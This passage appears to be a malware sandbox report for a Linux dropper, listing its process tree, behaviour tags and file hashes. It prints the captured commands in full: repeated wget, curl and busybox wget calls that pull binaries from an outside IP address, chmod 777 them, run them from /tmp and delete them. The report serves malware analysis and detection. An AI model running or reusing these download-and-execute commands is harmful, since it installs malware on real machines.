/usr/bin/wgetwget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:938
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:944
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:950
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:956
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:962
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:968
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:974
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97